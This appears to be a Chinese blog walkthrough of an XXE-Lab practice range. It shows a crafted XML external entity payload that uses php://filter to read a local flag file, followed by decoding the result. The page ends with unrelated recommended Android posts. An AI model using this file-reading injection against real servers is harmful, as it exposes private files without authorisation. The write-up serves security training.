XXE-Lab靶场漏洞复现

1.尝试登录

输入账号admin/密码admin进行登录,并未有页面进行跳转

2.尝试抓包分析请求包数据

我们可以发现页面中存在xml请求,我们就可以构造我们的xml请求语句来获取想要的数据

3.构造语句

复制代码
<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=c:/flag/flag">
]>
&xxe;

这里我们需要将xml语句放入post请求体中并发送

如上图所示便是我们需要获取的数据

4.数据解码

将获取的数据进行解码后我们即可得到我们的flag

flag{dmsioamdoiasdmdmwmdsmd}

相关推荐
杨筱毅6 分钟前
【Android】Handler/Looper机制相关的类图和流程图
android·java·流程图
Kapaseker1 小时前
酷炫的文字效果 — Compose 文本着色
android·kotlin
努力进修1 小时前
【JavaEE初阶】 多线程编程核心:解锁线程创建、方法与状态的创新实践密码
android·java·java-ee
生莫甲鲁浪戴1 小时前
Android Studio新手开发第二十八天
android·ide·android studio
zhaoyufei1332 小时前
Android触屏TP驱动事件上报以及多点触摸
android
杨筱毅2 小时前
【Android】详细讲解ViewDragHelper的实现原理(不含代码版)
android
代码s贝多芬的音符9 小时前
ios android 小程序 蓝牙 CRC16_MODBUS
android·ios·小程序
2501_9159184111 小时前
iOS 混淆实战 多工具组合完成 IPA 混淆、加固与工程化落地(iOS混淆|IPA加固|无源码混淆|Ipa Guard|Swift Shield)
android·ios·小程序·https·uni-app·iphone·webview
雨白11 小时前
让协程更健壮:全面的异常处理策略
android·kotlin
Jeled12 小时前
AI: 生成Android自我学习路线规划与实战
android·学习·面试·kotlin